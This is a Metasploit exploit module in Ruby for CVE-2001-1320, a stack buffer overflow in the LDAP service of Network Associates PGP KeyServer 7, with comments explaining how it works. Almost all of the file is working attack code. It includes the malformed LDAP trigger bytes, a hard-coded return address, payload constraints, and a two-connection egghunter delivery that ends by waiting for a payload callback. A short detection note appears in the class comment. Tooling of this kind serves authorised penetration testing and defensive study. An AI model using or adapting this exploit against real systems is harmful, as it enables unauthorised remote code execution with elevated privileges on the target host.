GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ldap/pgp_keyserver7.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2001-1320, a stack buffer overflow in the LDAP
  # service that ships with the NAI PGP Enterprise suite (tested by the
  # author against PGP KeyServer v7.0, see 'Description').
  #
  # Delivery is split over two TCP connections to the LDAP port because the
  # overflowing request leaves very little room for a payload: the first
  # request carries the overflow trigger plus an egghunter stub, the second
  # carries the real payload (the "egg") inside a request the server rejects
  # but which, per the author's note in #exploit, remains reachable by the
  # hunter. From a detection standpoint this looks like two short-lived
  # connections to TCP/389 carrying malformed LDAP messages in quick succession.
  Rank = GoodRanking

  # Remote::Tcp supplies connect/disconnect/sock; Egghunter supplies
  # generate_egghunter.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Egghunter

  # Registers module metadata and the single RPORT option. Nothing here
  # touches the network.
  #
  # @param info [Hash] metadata supplied by the framework and merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the LDAP service that is
          part of the NAI PGP Enterprise product suite. This module was tested
          against PGP KeyServer v7.0. Due to space restrictions, egghunter is
          used to find our payload - therefore you may wish to adjust WfsDelay.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2001-1320' ],
          [ 'OSVDB', '4742' ],
          [ 'BID', '3046' ],
          # PROTOS LDAPv3 test suite; the trigger bytes in #exploit were
          # recorded from it.
          [ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION ]
        ],
        # The LDAP service runs with elevated privileges on the target.
        'Privileged' => true,
        'Payload' => {
          # NOTE(review): these constraints appear to apply to the egg sent in
          # the second request; the 102-byte figure quoted in #exploit refers
          # to the trigger request, which is why the hunter is used - confirm.
          'Space' => 450,
          # NUL, LF, CR and space must not appear in the encoded payload.
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Return address overwrite; the author's note records the gadget and
          # the OS versions it was verified on.
          ["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp
        ],
        'DisclosureDate' => '2001-07-16',
        'DefaultTarget' => 0,
        # Reliability/stability/side effects were never characterised for this
        # module, so the framework reports them as unknown.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Standard LDAP port.
        Opt::RPORT(389)
      ]
    )
  end

  # Runs the two-stage delivery described on the class:
  #   1. connect, send the overflow trigger followed by the return address and
  #      the egghunter stub, disconnect;
  #   2. reconnect, send the payload wrapped in LDAP framing the server rejects,
  #      then hand off to the payload handler.
  # Because stage 2 depends on the hunter locating the egg, a session can take
  # noticeably longer to arrive than for a direct payload (hence the WfsDelay
  # hint in 'Description').
  def exploit
    connect

    # - Maximum payload space is 102 so we use EggHunter instead.
    # - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.

    # generate_egghunter returns a two-element array: this module sends [0]
    # (the hunter stub) with the trigger and [1] (the tagged payload, "egg")
    # in the second request. :checksum => true requests a checksumming hunter.
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg = hunter[1]

    # LDAP framing captured from an ldapsearch session; the egg is spliced
    # between the two halves below.
    eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff
    eggend = "\x80\x00"

    print_status("Sending trigger and hunter first...")

    # Stage 1: malformed request recorded from the PROTOS LDAPv3 suite, then the
    # target return address as a 32-bit little-endian value ('V') and the
    # hunter stub, terminated with a NUL byte.
    buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff
    buf << [target['Ret']].pack('V') + hunter[0]
    buf << "\x00"

    sock.put(buf)

    # The trigger connection is dropped and a fresh one opened for the egg.
    disconnect

    connect

    print_status("Sending hunted payload...")
    # Stage 2: payload wrapped in the sniffed LDAP framing.
    sock.put(eggstart + egg + eggend)

    # Wait for the payload to call back, then release the socket.
    handler
    disconnect
  end
end